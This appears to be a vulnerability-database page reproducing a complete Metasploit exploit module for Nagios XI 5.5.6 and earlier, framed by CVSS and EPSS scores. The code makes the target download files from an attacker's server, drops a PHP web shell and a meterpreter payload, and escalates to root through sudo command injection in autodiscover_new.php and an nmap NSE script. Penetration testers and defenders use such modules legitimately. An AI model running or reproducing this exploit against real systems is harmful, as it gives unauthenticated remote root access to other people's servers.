CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.4%
This module exploits two vulnerabilities in Nagios XI <= 5.5.6: CVE-2018-15708 which allows for unauthenticated remote code execution and CVE-2018-15710 which allows for local privilege escalation. When combined, these two vulnerabilities allow execution of arbitrary commands as root.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Nagios XI Magpie_debug.php Root Remote Code Execution',
'Description' => %q{
This module exploits two vulnerabilities in Nagios XI <= 5.5.6:
CVE-2018-15708 which allows for unauthenticated remote code execution
and CVE-2018-15710 which allows for local privilege escalation.
When combined, these two vulnerabilities allow execution of arbitrary
commands as root.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Lyne (@lynerc)', # Discovery and exploit
'Guillaume André (@yaumn_)', # Metasploit module
'bcoles', # Additional writable paths and usability/reliability/cleanup fixes
],
'References' =>
[
['CVE', '2018-15708'],
['CVE', '2018-15710'],
['EDB', '46221'],
['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
['URL', 'https://www.tenable.com/security/research/tra-2018-37']
],
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['Nagios XI <= 5.5.6', { version: Gem::Version.new('5.5.6') }]
],
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
'Privileged' => true,
'DisclosureDate' => '2018-11-14',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options([
OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
])
@WRITABLE_PATHS = [
# writable as 'apache' user
['/usr/local/nagvis/share', '/nagvis'],
# writable as 'apache' user
['/var/www/html/nagiosql', '/nagiosql'],
# writable as 'nagios' group
['/usr/local/nagiosxi/html/includes/components/autodiscovery/jobs', '/nagiosxi/includes/components/autodiscovery/jobs'],
# writable as 'nagios' group
['/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp', '/nagiosxi/includes/components/highcharts/exporting-server/temp'],
]
@writable_path_index = 0
@webshell_name = "#{Rex::Text.rand_text_alpha(10..12)}.php"
@meterpreter_name = Rex::Text.rand_text_alpha(10..12)
end
def on_request_uri(cli, _req)
if @current_payload == @webshell_name
send_response(cli, "<?php system($_GET['cmd'])?>")
else
send_response(cli, generate_payload_exe)
end
end
def primer
path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@current_payload}"
print_status("Uploading to #{path} ...")
res = magpie_debug("https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} -o '#{path}'")
unless res
print_error("Could not upload #{@current_payload} to target. No reply.")
return false
end
unless res.code == 200
print_error("Could not upload #{@current_payload} to target. Unexpected reply (HTTP #{res.code}).")
return false
end
if res.body.include?('Error: MagpieRSS: Failed to fetch')
print_error("Could not upload #{@current_payload} to target. cURL failed to download the file from our server.")
return false
end
register_file_for_cleanup(path)
end
def upload_success?
res = send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
}, 5
)
unless res
print_error("Could not access #{@current_payload}. No reply.")
return false
end
unless res.code == 200
print_error("Could not access #{@current_payload}. Unexpected reply (HTTP #{res.code}).")
return false
end
print_good("#{@current_payload} uploaded successfully!")
true
end
def magpie_debug(url = '')
send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri('/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'),
'vars_get' => {
'url' => url
}
}, 5
)
end
def check
res = magpie_debug
unless res
return CheckCode::Safe('No reply.')
end
if res.code == 200 && res.body.include?('MagpieRSS')
return CheckCode::Appears('Found MagpieRSS.')
end
CheckCode::Safe
end
def execute_command(cmd, _opts = {})
send_request_cgi(
{
'uri' => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
'method' => 'GET',
'vars_get' => {
'cmd' => cmd
}
}, 5
)
end
def exploit
all_files_uploaded = false
# Upload PHP web shell and meterpreter to writable directory on target
for i in 0...@WRITABLE_PATHS.size
@writable_path_index = i
for filename in [@webshell_name, @meterpreter_name]
@current_payload = filename
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
if !upload_success?
break
elsif filename == @meterpreter_name
all_files_uploaded = true
end
end
end
if all_files_uploaded
break
end
end
unless all_files_uploaded
fail_with(Failure::NotVulnerable, 'Uploading payload failed')
end
meterpreter_path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@meterpreter_name}"
print_status("Checking PHP web shell: #{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}")
res = execute_command('id')
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
end
id = res.body.scan(/^(uid=.+)$/).flatten.first
if id.blank?
fail_with(Failure::UnexpectedReply, 'PHP web shell did not execute our commands')
end
print_good("Success! Commands executed as user: #{id}")
print_status('Attempting privilege escalation ...')
nse_path = "/var/tmp/#{Rex::Text.rand_text_alpha(10..12)}.nse"
register_file_for_cleanup(nse_path)
# Commands to escalate privileges, some will work and others won't
# depending on the Nagios version
cmds = [
"chmod +x #{meterpreter_path} && sudo php /usr/local/nagiosxi/html/includes/" \
"components/autodiscovery/scripts/autodiscover_new.php --addresses=\'127.0.0.1/1`#{meterpreter_path}`\'",
"echo 'os.execute(\"#{meterpreter_path}\")' > #{nse_path} " \
"&& sudo nmap --script #{nse_path}"
]
# Try to launch root shell
for cmd in cmds
vprint_status("Trying: #{cmd}")
execute_command(cmd)
break if session_created?
end
unless session_created?
print_error('Privilege escalation failed')
print_status("Executing payload as #{id} ...")
execute_command("chmod +x #{meterpreter_path} && #{meterpreter_path}")
end
end
end
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.4%